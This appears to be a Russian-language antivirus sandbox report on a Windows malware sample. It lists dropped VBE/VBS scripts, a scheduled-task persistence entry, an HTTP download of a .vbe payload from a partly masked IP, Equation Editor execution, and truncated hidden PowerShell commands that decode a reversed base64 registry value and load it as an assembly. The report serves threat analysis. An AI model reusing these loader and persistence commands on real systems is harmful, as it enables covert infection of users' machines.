Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- <SYSTEM32>\tasks\bmprobekquttaxf
Вредоносные функции
Создает и запускает на исполнение (эксплоит)
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\wegivenbestthingswithbetterperofmrnacethingsonlin.vbe"
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\wegivenbestthingswithbetterperofmrnacethingsonlin.vbe
- %APPDATA%\bmprobekquttaxf.vbs
Сетевая активность
Подключается к
- '10#.#68.5.62':80
TCP
Запросы HTTP GET
- http://10#.#68.5.62/56/wegivenbestthingswithbetterperofmrnacethingsonline.vbe
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\wscript.exe' "%APPDATA%\bmpRoBeKqUTtaXF.VBS"
Запускает на исполнение
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -Command $ll='HKCU:\Software\bmpRoBeKqUTtaXF';$v='test';$ee=gp $ll;$uu=[Convert]::FromBase64String(($ee.$v|%{$_[-1..-($_.Length)]}) -join '');[System.Reflection.Assembly]::L... (со скрытым окном)
- '<SYSTEM32>\taskeng.exe' {FD32B32D-CBE6-4337-A5AE-07E5E8EFE725} S-1-5-21-3691498038-2086406363-2140527554-1000:cfhlgiougf\user:Interactive:[1]
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -Command $ll='HKCU:\Software\bmpRoBeKqUTtaXF';$v='test';$ee=gp $ll;$uu=[Convert]::FromBase64String(($ee.$v|%{$_[-1..-($_.Length)]}) -join '');[System.Reflection.Assembly]::L... (со скрытым окном)
- '<SYSTEM32>\wscript.exe' "%APPDATA%\bmpRoBeKqUTtaXF.VBS" (со скрытым окном)
